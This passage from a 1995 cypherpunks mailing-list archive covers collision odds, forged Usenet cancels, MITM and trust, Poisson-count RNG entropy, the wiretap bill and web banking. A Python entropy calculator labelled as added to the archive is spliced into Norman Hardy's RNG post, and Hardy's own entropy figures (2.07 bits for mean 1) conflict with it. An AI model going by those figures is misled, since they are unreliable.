>especially when 100 well chosen bits would be more than enough.

If everybody in the world has a 1024-bit key, that's 750 GB;
that's not bad at all by the time everybody in the world would have one,
and you could do MD5s in about 100 GB, which is a little more convenient.
Today, for 750 GB, you'd probably have tape in your system, or optical jukebox.
But not everybody has one; on the other hand, I suppose individuals
in well-heeled countries might end up with dozens of their own.

On the other hand, the number of 1024-bit primes is something like
2^1023/log(2^1024) (if I remember right), or roughly 2^1013.
The probability of two independent uniformly distributed primes
matching is about 2^1023/2^32, which is still an astoundingly
mindbogglingly LARGE number.  If you've got 1024 bits of entropy
in your input process, there will not _be_ any matches.
(If people insist on using sources of randomness like clocks or
user names, the chances are a lot higher....)

Now, for 128-bit hashes, whether it's MD5 or just the near-bottom 128 key bits,
by the time you get 2^64 of them together, you've got a 50% chance of a match.
Not a problem, since you'll not likely need that many, even for the 2^33 people
in the world.  Still not a problem.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Fri, 6 Oct 95 00:36:09 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <v02110109ac9a8c6cf466@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


An NNTP v2 protocol specification effort is underway in the IETF now.
Strictly to clean up existing extended practice - not to do new things.

Erik Fair







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 6 Oct 95 00:56:14 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <3074DAAB.3D62@netscape.com>
Message-ID: <Pine.SUN.3.91.951006005515.20417B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Oct 1995, Jeff Weinstein wrote:
 
>   If you take a look at verisign's home page, they will be offering
> "low assurance" certificates for free for non-commercial uses.  The
> only thing they will guarantee about these certs is that the subject
> name in the certificate is unique across all certificates signed
> by their class I CA.  You should be able to get one of these
> certs in real time via an HTML form.
 
What is the point of this?  What is to prevent someone from
getting certificates for a million of the most common and/or famous names
as quickly as possible?
 
Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 6 Oct 95 03:28:38 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac9ab28c02021004ba9d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 PM 10/5/95, Simon Spero wrote:
>On Thu, 5 Oct 1995, Norman Hardy wrote:
....
>> You presumably use the oddness of the count for your random bit in some
>> predetermined time interval. External radiation can change, but not bias
>> the parity. If the counter saturates, the counter may be biased towards one
>
>Hmmm. But isn't this method slightly biased? If the probability of  N
>events < the probability of N+1 events, wouldn't you need a large number
>of events per bit to make the bias insignificant?
....
What you really need is entropy (information). I propose concatenating
several counts and sending them thru MD5. The counts are distributed the
same way but are independent so that the entropy of the concatenation is
the sum of the entropies. Each count has a Poisson distribution. That tells
you how many bits of entropy there are in the input to the MD5. Take that
many bits, rounded down, as your random bits.

If there are an average of x bits in a time interval then the probability
that the count will be exactly K is (x^K/(K!))exp(-x). That is the Poisson
distribution. The entropy is then:

- sum[K=0 to infinity]  (x^K/(K!))exp(-x)log( (x^K/(K!))exp(-x))
= - sum[K=0 to infinity] (x^K/(K!))exp(-x)(log(x^K/(K!)) - x)
= - sum[K=0 to infinity] (x^K/(K!))exp(-x)(K*log(x) - log(K!) - x)

Here is a klutzy Scheme program to evaluate these:
(define (sum g)(letrec ((ss (lambda (n)
         (if (= n 0) (g 0) (+ (g n) (ss (- n 1)))))))
           (ss 30)))
(define (log2 x)(/ (log x)(log 2)))
(define (fact n)(if (= n 0) 1 (* n (fact (- n 1)))))
(define (p x k) (* (/ (expt x k)(fact k))(exp (- x))))
(define (en n)(sum (lambda(x) (let ((c (p x n)))
  (if (= c 0) 0 (* c (log2 c)))))))

(en 1) => 2.07
(en 3) => 2.92
(en 10) => 3.73
(en 15) => 4.0


I.e. if 1 count is expected on average there are two bits of entropy
in the count (surprising!) and if the count averages 10 then there
are 3.7 bits worth. It goes up as the log.

Before you bet your enterprise on this scheme consider that the math
was done at 03:30 AM.
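
An added example, not part of the original message: the entropy sum above evaluated in Python, followed by the hash-and-truncate step the message proposes. SHA-256 stands in for MD5, the min-entropy figure and the parity-bias formula go beyond the message, and the function names and sample counts are constructed for illustration.

```python
import hashlib
import math
import struct

# Constructed sample: 16 event counts from intervals averaging 10 events each.
SAMPLE_COUNTS = [9, 12, 7, 10, 11, 8, 14, 10, 6, 13, 9, 10, 12, 11, 8, 10]
SAMPLE_MEAN = 10.0


def poisson_log_pmf(mean, k):
    """ln P(count == k) for a Poisson count: ln((mean^k / k!) * exp(-mean))."""
    if mean <= 0:
        raise ValueError("mean must be positive")
    # Work in log space so large means do not underflow exp(-mean).
    return -mean + k * math.log(mean) - math.lgamma(k + 1)


def _support(mean):
    # Counts far enough past the mean that the remaining tail is negligible.
    return range(int(mean + 40 * math.sqrt(mean) + 50))


def shannon_entropy_bits(mean):
    """-sum over K of p(K) * log2 p(K), the sum written out in the message."""
    total = 0.0
    for k in _support(mean):
        lp = poisson_log_pmf(mean, k)
        total -= math.exp(lp) * lp
    return total / math.log(2)


def min_entropy_bits(mean):
    """-log2 of the single most likely count.

    This is the conservative figure when deciding how many bits to keep:
    it bounds the chance of guessing one count in one try.
    """
    best = max(poisson_log_pmf(mean, k) for k in _support(mean))
    return -best / math.log(2)


def parity_bias(mean):
    """|P(count is even) - 1/2| for a Poisson count, equal to exp(-2*mean)/2.

    This is the bias of the one-bit-per-interval parity method discussed
    earlier in the thread.
    """
    return math.exp(-2.0 * mean) / 2.0


def condense(counts, mean, entropy_fn=min_entropy_bits):
    """Concatenate independent counts, hash them, keep floor(total entropy) bits.

    Returns (number_of_bits, value). The per-count entropies add because the
    counts are assumed independent and identically distributed.
    """
    budget = math.floor(len(counts) * entropy_fn(mean))
    material = b"".join(struct.pack(">I", c) for c in counts)
    digest = hashlib.sha256(material).digest()  # SHA-256 used here in place of MD5
    nbits = min(budget, len(digest) * 8)        # never claim more than the hash emits
    value = int.from_bytes(digest, "big") >> (len(digest) * 8 - nbits)
    return nbits, value


if __name__ == "__main__":
    for m in (1, 3, 10, 15):
        print(m, round(shannon_entropy_bits(m), 3),
              round(min_entropy_bits(m), 3), parity_bias(m))
    print(condense(SAMPLE_COUNTS, SAMPLE_MEAN))
```

For a mean of 1 this evaluates to about 1.88 bits of Shannon entropy and 1.44 bits of min-entropy per count. Keeping floor(n * min-entropy) bits is the more cautious choice when the output is used as key material.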






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 6 Oct 95 07:20:44 PDT
To: perry@piermont.com
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <199510061420.HAA13735@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:02 PM 10/5/95 -0400, Perry E. Metzger wrote:
>
>"James A. Donald" writes:
> > They want to rule over us.  [...] There is no commonality of
> > purpose, hence no possibility of cooperation.   

At 05:02 PM 10/5/95 -0400, Perry E. Metzger wrote:
> I disagree. Most NSA types are probably stock government employees 
> who want to get their job done with the least muss and fuss. 
> 
> [...]
>
> I don't think the NSA is inherently the enemy at all. Signals 
> intelligence and protecting the U.S. and its citizens from signals 
> intelligence is probably necessary. 

Naturally members of an organization wish the organization to become 
great and powerful:  A great and powerful Netscape would be a 
Microsoft.  A great and powerful NSA would be a KGB or an SS.

Naturally everyone likes their job to be meaningful, everyone likes 
their job to have an impact.  Everyone wants to be important.  If the 
NSA are eyes without hands, they are impotent, they are useless.  So 
they want hands.  They want information about us to be used by the 
government, which means they want the government to exercise detailed 
control over us in response to their detailed information about us.

Our function lust would, if fulfilled, give us only moderate 
satisfaction, their function lust, if fulfilled, would give them 
vast power, and hence vast satisfaction.

Our function lust, if fulfilled, would give us more power over computers. 
Their function lust, if fulfilled, would give them more power over us.

> However, in general, what you are looking at is just the
> result of an entity trying to preserve itself having access to
> governmental force. I doubt that there are many "national domination"
> types in the agency, 

Despite grandstanding by the republicans, no government agency has ever
been closed down, or suffered layoffs, merely because its function became 
completely obsolete.  (Though some have suffered renamings and reshuffles, 
and some have been allowed to shrink through natural attrition)

The guys who used to control prices in the trucking industry now work 
full time regulating each other.  (I kid you not)  We are still stockpiling
helium to lift a fleet of dirigibles for world war one.  (Like Dave Barry, 
I am not making this up, though the Republicans have planned to close down 
the helium agency.)

Job preservation is irrelevant:  They are government employees.  
Power is the issue.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 07:34:50 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510061433.HAA04187@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:

>hfinney@shell.portal.com writes:
> > There is a difference between a MITM and the case you describe where you
> > are actually communicating securely with the person you think you are,
> > but he chooses to relay the messages around.  

>Seems to me that the idea of "communicating with the person you think
>you are" is intractably difficult if you're not sitting in the same
>room.  If you accept instead the idea of "communicating with the
>entity possessing the private half of a keypair" then life gets a lot
>simpler. 

I can certainly agree with the attractive simplicity of this notion.  My
point is that it is practically useless.  I believe this is a seductive
but very wrong idea.  As I said, it amounts to defining the problem away.
Does that mean that the problem (of MITM attacks) never existed at all,
that all of the effort that people have spent over the year to try to
solve it was wasted?  I am baffled by the fact that people are taking
this whole notion of "communicating with keys" seriously.  Keys do not
communicate.

One might as easily say that wiretaps are not an issue: I am not
communicating with the person I called, but with the other end of the
telephone wire.  If that wire end is actually (unknown to me) in the
hands of a government agent who has cut the wire and interposed his own
listening device, that's OK, because I'm still communicating with the
other end of the wire.  After all, I have no way of knowing whether the
person that I am talking to may actually be spreading my info to
anyone, so it doesn't really make any difference if he does it or the
wiretappers.  Etc., etc.  This is exactly like the argument about
communicating with keys.  Does this mean that we shouldn't worry about
wiretaps?  I hope not.  I really don't understand why the argument is
so much more persuasive in the case of keys.

> >                                               The difference is that if
> > you are actually communicating securely with an individual, you can form
> > some estimate of his personality, judgement, etc.  You may choose on this
> > basis to trust him, provide sensitive information, take risks, and so on.
> > But if he is actually behind a MITM then all bets are off. 

>I don't see why.  If, via some MITM (or "EITM", "Entity In The
>Middle") you are able to form a trust relationship with a public key,
>then I can see no practical difference.  Consider a dating advice
>service that's behind a public key.  You send it dozens of letters,
>and soon come to trust the advice being given.  By whatever means at
>your disposal you look for leaks of information you divulge and find
>none, so your trust increases.  If the private key is held by an AI
>program, by a team of learned specialists at a shadowy Swedish
>research institute, or by Rush Limbaugh, then what difference does it
>make to you?

The difference is that I form a judgement about the personality of the
person I am communicating with, whereas I can't form any such judgement
about the personality of the MITM.  Consider how, in life, we decide who
to trust.  Isn't it largely on the basis of communications?  We talk to
the person, we talk to other people about him, we take what we know of
him, and we decide to trust him.  If we suppose that there is in fact a
secure channel to another person, then I suggest that it is plausible to
suppose that we could enter into a trusted relationship with him, even
without a face-to-face meeting.  After all, what exactly does the face to
face meeting accomplish?  Yes, we see a little more about the person, we
can judge some non-verbal communications.  But it is not wholly
different.

We can always be wrong - the person may not be as trustworthy as we think
he is.  There is some probability of that which we must always keep in
mind.  But, and here is my main point, if a MITM is a possibility (and
we're taking the attitude that that's just fine, we're communicating with
keys, no problem if there's a MITM involved, don't bother to take any
steps to prevent it) then these assumptions about extending trust are a
lot riskier.  The probability of a betrayal will be much higher if a MITM
is possibly involved than if he is not.  Most people do not try to betray
their communicants.  But if (in the worst case) all lines were tapped by
men in the middle, then in fact all conversations are subject to this
betrayal.  As I wrote before, I don't see the difference between this
situation and one where there is no security at all (at least from
wiretappers).

> > All of your judgement about him is irrelevant.  At any time the
> > MITM can take advantage of the information you provide.  He can
> > even "blow his cover" and take extreme action, to your detriment.

>But then so can the "real person" you thought you were communicating
>with.

Most of the time your judgement about the real person will be valid, at
least with some experience.  Most people are not AI's or teams of
conspirators.  But you have absolutely no basis to make judgements about
the MITM.  In fact the greater probability is that his interests are
opposed to yours.

> > This situation with the MITM is actually about the same as if you were
> > communicating insecurely in the first place.  You are exposed to all of
> > the same risks.

>The only way to achieve the level of security offered by physical face
>to face communication with a person is to have a physical face to face
>conversation at some point.  If you only ever communicate via
>electronic means, you are always subject to the risk of dealing with a
>synthetic entity.  (I think.)

I don't think so, or at least the risk can be minimized much more than in
the model where we just say that we're communicating with keys, therefore
a MITM is perfectly legitimate because it's just a matter of who holds
the keys.  Suppose I want to talk to PC Magazine columnist John Dvorak.
Suppose I find a VeriSign certificate for his key, with his name and
employment information.  I've never met him.  We've never had a face to
face conversation.  Yet I claim I can communicate with considerable
security with Dvorak using this certificate, certainly more than if I
just use any old key which is lying around with his name on it, one which
may be owned by a MITM.

> > So if you are willing to accept communicating systems that allow this
> > kind of attack, you almost might as well not use cryptography at all.
> > (Not quite, because the MITM is a more expensive attack to mount than one
> > on an unsecured wire.)

>That's not clear.  I can have confidence when using a PK scheme that I
>am at least communicating securely with the entity that holds the
>private key.  That that entity may be leaking information through
>alternate channels is something I don't know; I don't see how you can
>securely defend against that in any case, or perhaps I don't see how
>defending against it in the case that you think you know who you're
>dealing with is any different than defending against it if you accept
>that you don't know who you're dealing with.

>(I've read over that a couple times, and I think it's OK.)

If you are in fact communicating with the person you think you are, you
can use all the information you have about him (including other
conversations) to judge his personality and trustworthiness.  Yes, this
can be mistaken - but the same thing happens in the real world.  That
doesn't mean that we abandon the whole idea of trust.  We still can be
right most of the time.  However if you know that a MITM may be involved,
you will be much slower to extend trust.  In fact you have to act as
though you have an unsecured channel.

> > All of your messages are by definition going to the communicatee
> > with whom you are communicating.  If the particular communicatee
> > who is receiving your message chooses to relay it or spread the
> > information around in other ways, that is the right and privilege
> > of the communicatee.  But messages are going to the communicatee
> > they are going to, whether encryption is used or not.  So
> > encryption is not necessary. 

>Ah, but that last point is clearly *not* true.  When you encrypt, you
>at least have some assurance that between you and the communicatee
>there's security.  If (unfortunately) the "communicatee" is a
>conspiracy that begins at the CO where your home phone lines
>terminate, then indeed you've got a problem.

No, by definition the "communicatee" is the set of all the people who
see your messages.  So by definition between you and the communicatee
there is security even without encryption (since no one other than the
communicatee sees the message).  Sophistry?  The number of people who can
receive your messages is no greater without encryption than if you use
encryption but don't take steps against a MITM and in fact adopt a stance
which states that MITM attacks don't exist.

> > This argument seems to mirror the one for why we only communicate with
> > keys, that if a key wants to do something nasty we can't stop it (him?),
> > etc.  I say, we don't communicate with keys.  We communicate with people
> > (or occasionally programs).

>But how do you know?  (How do you know there aren't a team of people
>standing beside me advising me on what to type?)  And note that you
>can hardly keep me from doing something nasty: to prove it, I'm going
>to get up right now and fetch my favorite beverage, which is a 6oz can
>of cranberry juice mixed with a 12oz can of Diet Coke :-)

I don't know for sure, but if you tell me or give me the impression over
a period of time that you are keeping our conversations private, and I
decide that you are honest based on our conversations and what I know
about you from others, then I can make a judgement with a reasonable
chance of safety.  Yes, I can be mistaken.  But that doesn't mean that I
should abandon the whole idea of trust.  Otherwise I will never trust
anybody in any part of life.  But preventing MITM attacks is very
important to being able to extend trust in the online world.  Defining
them away is not a satisfactory solution.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 6 Oct 95 07:35:55 PDT
To: cypherpunks@toad.com
Subject: Where is text of wiretap bill
Message-ID: <199510061435.HAA16061@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Did the wiretap bill, as passed, contain those magic words:
"or other legal authority"?

Where can I get the text of the wiretap bill?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 6 Oct 95 05:37:29 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <9510061236.AA25892@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > There is a difference between a MITM and the case you describe where you
 > are actually communicating securely with the person you think you are,
 > but he chooses to relay the messages around.  

Seems to me that the idea of "communicating with the person you think
you are" is intractably difficult if you're not sitting in the same
room.  If you accept instead the idea of "communicating with the
entity possessing the private half of a keypair" then life gets a lot
simpler. 

 >                                               The difference is that if
 > you are actually communicating securely with an individual, you can form
 > some estimate of his personality, judgement, etc.  You may choose on this
 > basis to trust him, provide sensitive information, take risks, and so on.
 > But if he is actually behind a MITM then all bets are off. 

I don't see why.  If, via some MITM (or "EITM", "Entity In The
Middle") you are able to form a trust relationship with a public key,
then I can see no practical difference.  Consider a dating advice
service that's behind a public key.  You send it dozens of letters,
and soon come to trust the advice being given.  By whatever means at
your disposal you look for leaks of information you divulge and find
none, so your trust increases.  If the private key is held by an AI
program, by a team of learned specialists at a shadowy Swedish
research institute, or by Rush Limbaugh, then what difference does it
make to you?

 > All of your judgement about him is irrelevant.  At any time the
 > MITM can take advantage of the information you provide.  He can
 > even "blow his cover" and take extreme action, to your detriment.

But then so can the "real person" you thought you were communicating
with.

 > This situation with the MITM is actually about the same as if you were
 > communicating insecurely in the first place.  You are exposed to all of
 > the same risks.

The only way to achieve the level of security offered by physical face
to face communication with a person is to have a physical face to face
conversation at some point.  If you only ever communicate via
electronic means, you are always subject to the risk of dealing with a
synthetic entity.  (I think.)

 > So if you are willing to accept communicating systems that allow this
 > kind of attack, you almost might as well not use cryptography at all.
 > (Not quite, because the MITM is a more expensive attack to mount than one
 > on an unsecured wire.)

That's not clear.  I can have confidence when using a PK scheme that I
am at least communicating securely with the entity that holds the
private key.  That that entity may be leaking information through
alternate channels is something I don't know; I don't see how you can
securely defend against that in any case, or perhaps I don't see how
defending against it in the case that you think you know who you're
dealing with is any different than defending against it if you accept
that you don't know who you're dealing with.

(I've read over that a couple times, and I think it's OK.)

 > In fact, I can facetiously prove that cryptography is unnecessary.  We
 > are not communicating with individuals, but with communicatees.  

Works for me.  (Indeed, Hal, I have no idea who or what you are :-)

 > All of your messages are by definition going to the communicatee
 > with whom you are communicating.  If the particular communicatee
 > who is receiving your message chooses to relay it or spread the
 > information around in other ways, that is the right and privilege
 > of the communicatee.  But messages are going to the communicatee
 > they are going to, whether encryption is used or not.  So
 > encryption is not necessary. 

Ah, but that last point is clearly *not* true.  When you encrypt, you
at least have some assurance that between you and the communicatee
there's security.  If (unfortunately) the "communicatee" is a
conspiracy that begins at the CO where your home phone lines
terminate, then indeed you've got a problem.

 > This argument seems to mirror the one for why we only communicate with
 > keys, that if a key wants to do something nasty we can't stop it (him?),
 > etc.  I say, we don't communicate with keys.  We communicate with people
 > (or occasionally programs).

But how do you know?  (How do you know there aren't a team of people
standing beside me advising me on what to type?)  And note that you
can hardly keep me from doing something nasty: to prove it, I'm going
to get up right now and fetch my favorite beverage, which is a 6oz can
of cranberry juice mixed with a 12oz can of Diet Coke :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Oct 95 04:58:10 PDT
To: cypherpunks@toad.com
Subject: FON_tap
Message-ID: <199510061158.HAA17199@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


10-6-95. WSJaper has a report on the global rise of unions 
between banks and telcos for exploiting electronic 
marketecture.


Quotes:


"Being in partnership with these phone people is like shooting 
adrenalin into your veins," gushes one banker who recently 
invested in the national phone company.


"Bricks and mortar won't do it," says another banker, "you have 
to drive down the transaction cost."


FON_tap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Fri, 6 Oct 95 08:17:23 PDT
To: cypherpunks@toad.com
Subject: Graphic encryption
Message-ID: <199510061517.IAA10725@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I am currently working for a company that has a graphic encryption 
product called PrivaSoft. I was wondering if there were other products 
or engines that also provide graphic encryption. (graphic encryption is 
the use of an encryption algorithm to scramble an image taken of a 
document.) 
 
Also if any of ya'll are familiar with graphic encryption, I am looking 
for opinions as to its strengths / weaknesses.


Steve O.
Mgr. Tech. Services
*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
 Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 6 Oct 95 08:24:55 PDT
To: cypherpunks@toad.com
Subject: Re: Where is text of wiretap bill
In-Reply-To: <199510061435.HAA16061@blob.best.net>
Message-ID: <199510061524.IAA02409@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "James A. Donald" <jamesd@echeque.com> writes:
> Did the wiretap bill, as passed, contain those magic words:
> "or other legal authority"?

Yes, it does, repeatedly.

          SEC. 103. ASSISTANCE CAPABILITY REQUIREMENTS.
            (a) Capability Requirements: Except as provided in subsections
          (b), (c), and (d) of this section and sections 108(a)  and 109(b)
          and (d), a telecommunications carrier shall ensure that its
          equipment, facilities, or services that provide a customer or
          subscriber with the ability to originate, terminate, or direct
          communications are capable of--
                (1) expeditiously isolating and enabling the government,
              pursuant to a court order or other lawful authorization, to
              intercept, to the exclusion of any other communications, all
              wire and electronic communications carried by the carrier
...
                (2) expeditiously isolating and enabling the government,
              pursuant to a court order or other lawful authorization, to
              access call-identifying information that is reasonably
              available to the carrier--
...
                (3) delivering intercepted communications and
              call-identifying information to the government, pursuant to a
              court order or other lawful authorization, in a format such
              that they may be transmitted by means of equipment, facilities,
...
          SEC. 105. SYSTEMS SECURITY AND INTEGRITY.
            A telecommunications carrier shall ensure that any interception
          of communications or access to call-identifying information
          effected within its switching premises can be activated only in
          accordance with a court order or other lawful authorization and
          with the affirmative intervention of an individual officer or

> Where can I get the text of the wiretap bill?

From the Library of Congress' "Thomas" server: http://thomas.loc.gov/
Look for either SB 2375 (Senate) or HR 4922 (House).

An assistant director of the FBI, William Baugh, spoke recently at the ICI
conference in DC.  He said he hoped American industry would be cooperative
in making the voluntary compliance with TESSERA or other GAK widespread,
because if it doesn't happen then they would need to come back and get
more Congressional action, and "we found the coercive solution we had to
use for Digital Telephony very draining."

If <that> doesn't get them your sympathy, what will?

	Jim Gillogly
	Sterday, 15 Winterfilth S.R. 1995, 15:18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 6 Oct 95 05:40:46 PDT
To: cypherpunks@toad.com
Subject: Trust company banks on Internet
Message-ID: <v02120d01ac9ad40382ab@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Fri, 6 Oct 95 08:10:41 -0400
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
X-Minuet-Version: Minuet1.0_Beta_14.1
Reply-To: <JENKINS@fox.nstn.ca>
X-Popmail-Charset: English
To: www-buyinfo@allegra.att.com
Subject: Trust company banks on Internet

First Internet Banker  ??  !!

Check out
http://www.bayshore.com

>From the Toronto Globe and Mail page B 1
       Fri 6 Oct 95
"Bayshore set to become first Internet banker  -
Trust promises approval in as little as two minutes"

>From the Ottawa Citizen Page B7 Fri 6 Oct 95

 " Trust company banks on Internet - Financial shopping
in cyberspace arrives in Canada next week with the first
interactive banking service on the Internet. Analysts say there
is a lot more coming soon.
Bayshore Trust Co. plans to take applications for loans up
to $15,000 and orders for guaranteed investment certificates
directly from customers on the World Wide Web"
Gordon Jenkins
jenkins@fox.nstn.ca
http://www.infop.com/karoma
 --
 GORD JENKINS
e mail  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 6 Oct 95 09:44:09 PDT
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <199510051540.IAA23612@ix.ix.netcom.com>
Message-ID: <g7VJcD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


[A quick last word before I leave for a wilderness area with no net.access.]

In article <199510051540.IAA23612@ix.ix.netcom.com>, Bill Stewart
<stewarts@ix.netcom.com> writes:
[Huuskonen-Franz]
>Aside from the forged-From:-bogus-cancel spam /r$ proposed, this has
>the problem that it still only allows the originator to cancel a message,
>and not either the moderator of a moderated group or a Good Spam-canceller
>like CancelMoose, as well as stopping censors and cancel-spammers.

The respected CancelMoose no longer posts cancels, but posts PGP-signed NoCeM
notices. In fact, CancelMoose's web site has some nice things to say about the
Huuskonen-Franz proposal. I quote URL: http://www.cm.org/about-cancels.html:

]About Cancels
]*************
]
]A number of people have asked about the relationship between this project
]and spam cancels. IMHO, the point is moot.
]
]I envision unauthenticated cancel messages will rapidly become obsolete,
]once people start posting menu driven cancelbots. If we want cancels back
]we'll have to authenticate them.
]
]Taneli Huuskonen first suggested this scheme to me, and I think it's an
]excellent idea.
]
]For every posted message there is a "Cancel-Key" which is the message-id of
]the message hashed with a secret password. The MD5 of the cancel-key is the
]"Cancel-Challenge" which is posted as a header in every post you make. To
]cancel that post, the cancel message must have a copy of the Cancel-Key in
]the headers. An admin can configure his news software to add another
]Cancel-Challenge to the post, if he/she wishes to retain the rights to
]cancel it. The only people this leaves out in the cold is the moderators--
]this does not allow them to protect their newsgroup-- perhaps a public key
]based system to "prove" moderation will prove necessary, but that will
]require some MAJOR reworkings of news...
]
]Email: moose@cm.org

I urge cypherpunks to read the NoCeM information on URL http://www.cm.org/ and
to jump on the NoCeM bandwagon (such as, start posting PGP-signed "show"
ratings for articles we find worth highlighting).

I see nothing in RFC 1036 that says that a moderator of a newsgroup should be
able to cancel other people's posts in his/her group. There's an old Usenet
tradition (bad, IMO) that when Alice posts an article in Bob's moderated group
and inserts her own "Approved:" header, then Bob is expected to impersonate
Alice and to post a cancel in Alice's name for the unauthorized article. But,
at present, nothing prevents some Charlie from impersonating Bob impersonating
Alice and forging a cancel for an article that actually was approved by Bob.

Basically, if Alice posts an article with her own "Approved:" header in Bob's
newsgroup, then this problem is not going to be solved by just cancelling her
article(s). If Alice keeps doing that, it becomes necessary to talk to her
feeds about aliasing her site, and the cancels have little to do with it.

IMVHO, only the author should be able to cancel her own postings in a moderated
group. If the posting was not properly approved, she should cancel them to show
good will. Once Bob has _approved Alice's posting in his moderated group, he
shouldn't be able to impersonate Alice to cancel it, but should ask Alice.

(And all this can be done with the Huuskonen-Franz scheme.)

Bob can instead protect his newsgroup by posting a PGP-signed NoCeM notice:
 Action: hide
 Type: unauthorized posting
or by asking someone widely trusted, like CM, to post such a notice.

Likewise when Brad Templeton and/or Co$ (sorry Brad for lumping you together :)
see an article which they think quotes their copyrighted material, they should
not forge a cancel, but post a PGP-signed NoCeM notice:
 Action: hide
 Type: copyright violation
I wonder how many sites would honor CancelPoodle's NoCeM notices? :)

The Huuskonen-Franz scheme would still allow Clarinet to continue massively
canceling/superseding their own articles.

Continuing to quote Bill Stewart:
>Cancellation is a sufficiently local-policy-dependent issue, and reasonably
>low volume compared to the rest of news, that it probably makes sense for
>the various news programs to hand cancellation requests off to an external
>program, which can be locally modified as desired.

It would be nice if inn and nn called the same external program to handle
cancels. Now nn's database easily gets out of sync.

With an external program, each site could choose to honor only authenticated
cancels and ignore 3rd party NoCeM's (but let the users mark NoCeM'd articles
as read, if they want to); or honor all cancels; or something in between.

>One approach is to add digital signature and verification capability
>to News, at least to support cancels; doing this in an outboard
>cancel-daemon is obviously easier.  RIPEM-SIG is a signature-only
>version of RIPEM which is exportable, probably just in binaries.
>The local cancel-daemon could accept cancellation requests that were signed
>by anybody on the list of locally-approved cancellers; one site could accept
>cancels from Cancelmoose, newsgroup moderators, and Helena Kobrin;
>another could do authors only.  This would, of course, encourage people
>to get their digital signatures out there to allow themselves to cancel
>their own messages.

